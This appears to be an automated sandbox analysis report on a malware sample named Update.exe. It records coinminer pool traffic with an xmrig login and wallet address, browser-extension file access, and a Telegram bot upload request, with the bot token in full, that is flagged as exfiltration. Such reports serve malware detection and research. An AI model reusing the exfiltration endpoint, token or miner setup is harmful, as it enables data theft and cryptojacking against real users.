{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4275xju8vvcjp1rvqqbk2z7gkzlgujw9jaxrn4dakktgeodnr4btkauhemwujp3hsrkletey7vfhgfpp7yjee8q6qzvfkbp","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
                    Source: Update.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Update.exe, Update.exe, 00000001.00000002.1994356570.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Update.exe, 00000001.00000002.1986363655.00007FFDFA21C000.00000040.00000001.01000000.00000015.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: Update.exe, 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Update.exe, 00000000.00000003.1661738762.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Update.exe, Update.exe, 00000001.00000002.1994638297.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Update.exe, Update.exe, 00000001.00000002.1990383539.00007FFE10231000.00000040.00000001.01000000.00000011.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Update.exe
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: Update.exe, 00000001.00000002.1993654455.00007FFE126EB000.00000040.00000001.01000000.00000008.sdmp
                    Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: Update.exe, 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: Update.exe, 00000001.00000002.1987855894.00007FFDFB65F000.00000040.00000001.01000000.00000004.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Update.exe, Update.exe, 00000001.00000002.1994077253.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: Update.exe, 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Update.exe, 00000001.00000002.1993654455.00007FFE126EB000.00000040.00000001.01000000.00000008.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Update.exe, Update.exe, 00000001.00000002.1993393229.00007FFE11511000.00000040.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Update.exe, Update.exe, 00000001.00000002.1990826986.00007FFE10251000.00000040.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Update.exe, Update.exe, 00000001.00000002.1991340548.00007FFE10301000.00000040.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: Update.exe, Update.exe, 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: Update.exe, Update.exe, 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Update.exe, Update.exe, 00000001.00000002.1989991637.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F79280 FindFirstFileExW,FindClose,0_2_00007FF623F79280
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF623F783C0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F91874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF623F91874
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F79280 FindFirstFileExW,FindClose,1_2_00007FF623F79280
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F91874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF623F91874
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF623F783C0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFAFA322E
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.4:49745 -> 149.154.167.220:443
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 45.76.89.70 80
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewIP Address: 45.76.89.70 45.76.89.70
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: unknownDNS query: name: ip-api.com
                    Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:52904 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49743 -> 45.76.89.70:80
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F6A24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot5909479554:AAHBh0elmAGqD01xNsl_4RAIClCAhxA3CaI/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 759987User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=0974d66c08e6057af1c13b6cab35cb83
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Mon, 09 Sep 2024 04:31:28 GMTContent-Type: application/jsonContent-Length: 93Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                    Source: Update.exe, 00000000.00000003.1664098813.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000002.2000078001.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: Update.exe, 00000000.00000003.1664098813.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000002.2000078001.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000002.2000078001.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: Update.exe, 00000000.00000003.1665024233.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: Update.exe, 00000001.00000002.1983282257.000002D8F6320000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1708876092.000002D8F637F000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983074177.000002D8F6080000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1695447044.000002D8F637E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1914017106.0000021918630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: Update.exe, 00000000.00000003.1665024233.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                    Source: Update.exe, 00000000.00000003.1665024233.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000002.2000078001.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Update.exe, 00000000.00000003.1664098813.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SH
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000002.2000078001.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Update.exe, 00000000.00000003.1664098813.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: Update.exe, 00000000.00000003.1664098813.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1663838002.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664363817.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: Update.exe, 00000000.00000003.1664098813.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: Update.exe, 00000000.00000003.1665024233.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                    Source: Update.exe, 00000001.00000003.1677380903.000002D8F5E51000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1677065242.000002D8F5E51000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1674023060.000002D8F5E5D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1671232670.000002D8F5E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800(
                    Source: Update.exe, 00000001.00000003.1677380903.000002D8F5DE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
